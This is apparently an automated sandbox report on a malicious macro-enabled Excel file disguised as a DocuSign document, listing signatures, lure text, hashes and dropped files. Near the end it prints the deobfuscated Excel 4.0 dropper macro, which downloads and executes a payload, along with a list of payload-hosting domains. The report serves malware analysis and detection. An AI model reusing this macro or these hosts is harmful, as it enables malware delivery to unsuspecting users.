Loading ...

Play interactive tourEdit tour

Analysis Report Calculation-380472272-01262021.xlsm

Overview

General Information

Sample Name:Calculation-380472272-01262021.xlsm
Analysis ID:344642
MD5:2b6f94633c1da265ab89446858613d1e
SHA1:22a540fbff6942b60854a9d1104445999491b494
SHA256:767ef1804a87694f5be1f482d6c157dfb652e8af3e67fc6481154f36c3a98e86

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Excel documents contains an embedded macro which executes code when the document is opened

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2264 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAD92E32.pngJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 1 11 12 1 from the yellow bar above 13 14 1 @Once You have Enable Editing, please
Source: Screenshot number: 4Screenshot OCR: Enable Content 15 1 from the yellow bar above 16 CI 17 I " I WHY I CANNOTOPEN THIS DOCUMENT? I
Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Calculation-380472272-01262021.xlsmInitial sample: EXEC
Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9302"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="5" r:id="rId1"/><sheet name="Lodet" sheetId="4" state="hidden" r:id="rId2"/><sheet name="kOTI" sheetId="1" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Lodet!$A$154</definedName></definedNames><calcPr calcId="144525"/></workbook>
Source: classification engineClassification label: mal56.expl.evad.winXLSM@1/9@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Calculation-380472272-01262021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC918.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:344642
Start date:26.01.2021
Start time:20:54:57
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 44s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:Calculation-380472272-01262021.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.expl.evad.winXLSM@1/9@0/0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WerFault.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF02DD10.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):848
Entropy (8bit):7.595467031611744
Encrypted:false
SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
MD5:02DB1068B56D3FD907241C2F3240F849
SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
Malicious:false
Reputation:moderate, very likely benign file
Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAD92E32.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):8301
Entropy (8bit):7.970711494690041
Encrypted:false
SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
MD5:D8574C9CC4123EF67C8B600850BE52EE
SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
Malicious:false
Reputation:moderate, very likely benign file
Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F851448B.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):557
Entropy (8bit):7.343009301479381
Encrypted:false
SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
MD5:A516B6CB784827C6BDE58BC9D341C1BD
SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
Malicious:false
Reputation:moderate, very likely benign file
Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
C:\Users\user\AppData\Local\Temp\2FCE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):26310
Entropy (8bit):7.561356874041966
Encrypted:false
SSDEEP:768:1nnlEBP+byspgP5Gp5S6f6lW+u7qk8bJDXw:BnlwWWspgP5u5jLfc1DA
MD5:EC14C2F6A901BA99B2C09F606A19AD97
SHA1:8AD66BAEFC0A776277F44D631B0F7A5D5694BC9D
SHA-256:03A4CEFB1F3FDFB2E6FF6A2906A6C765C6950CF5A982786AD17396C9FC58ACF3
SHA-512:C72DAF8DCD8D87194A5F79171F0450E46E2E1B8C663628D6DDD987B5357F32999B1477EAF75DBD64993DB9C8A5F40B21F58AD6C96682CC84943E8984CD5C15F5
Malicious:false
Reputation:low
Preview: .U.n.0....?..........C....I?.&..an.0.........#.z.Bj.Fq8..XS=CD.]......I...Z.....*L.)a...m.......6.VT.e}J.;.({........G+....!..~9.}.....)c......I...wJ...z.].j...h)....N..~.....O........ Y...1>@Jd..?..\..m...WD0.W2!s...b.{......C.y;...'-`...{..........z...9...X.F.iJb..2..'..hNh....S.D^n....'9.~.I...Qt.*d...z.f.3..Ov.m7.......qL[.xf.;.).^DP..6rwv..cO.PQ.d.|x.x......F^.......{....}...qG8].k...u .I...........{g..cE.:...1.........PK..........!.................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Calculation-380472272-01262021.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Wed Jan 27 03:55:38 2021, atime=Wed Jan 27 03:55:38 2021, length=26310, window=hide
Category:dropped
Size (bytes):2238
Entropy (8bit):4.53205369629989
Encrypted:false
SSDEEP:48:8lK/XT+Nn9JN5Vvn0Qh2lK/XT+Nn9JN5Vvn0Q/:8c/X6NnXVvn0Qh2c/X6NnXVvn0Q/
MD5:ED583A010F8466FAE77BE9D21691E6D2
SHA1:A50EB7E8E5F8C91AFF62164162560E4BDADB025A
SHA-256:53078E988BD78210A5121552F5A0E3915E15289ABCA19A48F5DECD2F266484E4
SHA-512:A4A6466D07F853B16E009020C151BBD451C367A39010EAD8C4468E18465C73E3D53EABC469D79DE657418378060911C5A1459AD1E18DDAEFC7ED056C2570EB89
Malicious:false
Reputation:low
Preview: L..................F.... ...jI...{...}.h....@.h....f...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..f..;R.& .CALCUL~1.XLS..t.......Q.y.Q.y*...8.....................C.a.l.c.u.l.a.t.i.o.n.-.3.8.0.4.7.2.2.7.2.-.0.1.2.6.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\045012\Users.user\Desktop\Calculation-380472272-01262021.xlsm.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.a.l.c.u.l.a.t.i.o.n.-.3.8.0.4.7.2.2.7.2.-.0.1.2.6.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 03:55:38 2021, atime=Wed Jan 27 03:55:38 2021, length=8192, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.4853953823630235
Encrypted:false
SSDEEP:12:85QdCHVCLgXg/XAlCPCHaX7B8NB/FoPXX+WnicvbS3ubDtZ3YilMMEpxRljKCcTg:85UCHVU/XTr6NcPXYem3iDv3q0rNru/
MD5:14D590F502C4D95261672BBD929F0873
SHA1:35E886C5D636FDB43601A2C2443FB667BCDC2C9B
SHA-256:26D4B26A650352ACAB9CC88DA7D9ADD1F5B344393CB0A5C3CF0766AD5234CDD5
SHA-512:4941B14F45D171EE6A2BE878BA44199DF3EC7E02268961824C3AC365B1D4A6BAC01757F37804A828D3713331F4686728FCE56831A72482B369F6AA9DBCE54C10
Malicious:false
Reputation:low
Preview: L..................F...........7G...@.h....@.h.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....;R.&..Desktop.d......QK.X;R.&*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\045012\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......045012..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):145
Entropy (8bit):4.73169410823379
Encrypted:false
SSDEEP:3:oyBVomxWtMK/JWXXSXIDp6l+gHK/JWXXSXIDp6lmxWtMK/JWXXSXIDp6lv:djeMALKUTHALKUzMALKU1
MD5:303D6E1830C3C7F1986171CAA81777B0
SHA1:6E9458D8B0E2170B4F161183B63D919F63D70868
SHA-256:4375174678E2F0EAD337B46111F03994D8C0AE310B02BCDE301F6D4C529EA567
SHA-512:1E819B96D6C9E84EB9FE338FE3866FDF62EDF7468E9E80F74C1168C67566ACAA3109DCE90EE6DFD8CFAE993E93CB076E55A203D93FF0F2800992185E36655296
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..Calculation-380472272-01262021.LNK=0..Calculation-380472272-01262021.LNK=0..[misc]..Calculation-380472272-01262021.LNK=0..
C:\Users\user\Desktop\BFCE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):26310
Entropy (8bit):7.561356874041966
Encrypted:false
SSDEEP:768:1nnlEBP+byspgP5Gp5S6f6lW+u7qk8bJDXw:BnlwWWspgP5u5jLfc1DA
MD5:EC14C2F6A901BA99B2C09F606A19AD97
SHA1:8AD66BAEFC0A776277F44D631B0F7A5D5694BC9D
SHA-256:03A4CEFB1F3FDFB2E6FF6A2906A6C765C6950CF5A982786AD17396C9FC58ACF3
SHA-512:C72DAF8DCD8D87194A5F79171F0450E46E2E1B8C663628D6DDD987B5357F32999B1477EAF75DBD64993DB9C8A5F40B21F58AD6C96682CC84943E8984CD5C15F5
Malicious:false
Reputation:low
Preview: .U.n.0....?..........C....I?.&..an.0.........#.z.Bj.Fq8..XS=CD.]......I...Z.....*L.)a...m.......6.VT.e}J.;.({........G+....!..~9.}.....)c......I...wJ...z.].j...h)....N..~.....O........ Y...1>@Jd..?..\..m...WD0.W2!s...b.{......C.y;...'-`...{..........z...9...X.F.iJb..2..'..hNh....S.D^n....'9.~.I...Qt.*d...z.f.3..Ov.m7.......qL[.xf.;.).^DP..6rwv..cO.PQ.d.|x.x......F^.......{....}...qG8].k...u .I...........{g..cE.:...1.........PK..........!.................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\~$Calculation-380472272-01262021.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Reputation:moderate, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.562835051551454
TrID:
  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
  • ZIP compressed archive (8000/1) 16.67%
File name:Calculation-380472272-01262021.xlsm
File size:26363
MD5:2b6f94633c1da265ab89446858613d1e
SHA1:22a540fbff6942b60854a9d1104445999491b494
SHA256:767ef1804a87694f5be1f482d6c157dfb652e8af3e67fc6481154f36c3a98e86
SHA512:a44021920b15ba6bdd2918d25c21e7a3b63e71172fcb2c86fe1f72506d18feefc4c6f2c1884ac38ca3aa2df02867794c9ac650538e870cd5d828eea55b123cd0
SSDEEP:768:sMfl6aGcGyspgPGw5S6f6TfW+u7DhcJkhoZd:Dfl60vspgPGw5jDfJAeU
File Content Preview:PK..........!.................[Content_Types].xml ...(......................................................................................................................................................................................................"".

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "Calculation-380472272-01262021.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,,,,,,,,,,,=B154(),"=FORMULA.FILL(kOTI!U54&kOTI!U55&kOTI!U56&kOTI!U57&kOTI!U58&kOTI!U59,BB53)","=FORMULA.FILL(kOTI!AC56,HI18807)","=EXEC(""r""&kOTI!AC60&"" ""&kOTI!AC59&"",D""&kOTI!AC61)",=B156(),=C156(),=HALT()"=REGISTER(HI18807,AN32726,IK16309,DI7875,,1,9)","=FORMULA.FILL(kOTI!V53&kOTI!V54&kOTI!V55&kOTI!V56&kOTI!V57&kOTI!V58&kOTI!V59&kOTI!V60&kOTI!V61&kOTI!V62&kOTI!V63&kOTI!V64&kOTI!V65&kOTI!V66&kOTI!V67&kOTI!V68&kOTI!V69&kOTI!V70,HZ48004)","=FORMULA.FILL(kOTI!AC57,AN32726)","=Vuolasd(GT17028,AQ4875,1)",=B158(),=C158(),,"=FORMULA.FILL(kOTI!U62&kOTI!U63&kOTI!U64&kOTI!U65&kOTI!U66&kOTI!U67,HI18898)","=FORMULA.FILL(""BCCJ"",IK16309)",,=B160(),=C160(),,"=FORMULA.FILL(kOTI!AC58&B169,GT17028)","=FORMULA.FILL(""Niokaser"",IK4106)","=REGISTER(BB53,HZ48004,HI18898,IK4106,,1,9)",=B162(),=C162(),"=Niokaser(0,GT17028,AQ4875,0,0)","=FORMULA.FILL(kOTI!AC59,AQ4875)","=FORMULA.FILL(""Vuolasd"",DI7875)",,"=FORMULA.FILL(kOTI!AC60,AS41071)",=A161(),=GOTO(D154),=B165(),,,"=FORMULA.FILL(kOTI!AC61,HG9961)",,,=C154(),,,,,,,,,"=INDEX(C172:C178,RANDBETWEEN(1,8))&B170",,,"=RANDBETWEEN(2222222,8888888)&"".jpg""",,,,,,,elisalopezphotography.com/ouahvdofd/,,,seat.nucleus.studio/ooono/,,,ssms.dsscwtl.in/sngenfnr/,,,jeffspoolservices.com/amghvhgpomyf/,,,karantani.com/ehxxysf/,,,craftmarketing.ca/mbkgreyilv/,,,fadingmemoriespodcast.com/bdxduufm/,

Network Behavior

No network behavior found

Code Manipulations

Statistics

System Behavior

General

Start time:20:55:36
Start date:26/01/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13fe10000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Reset < >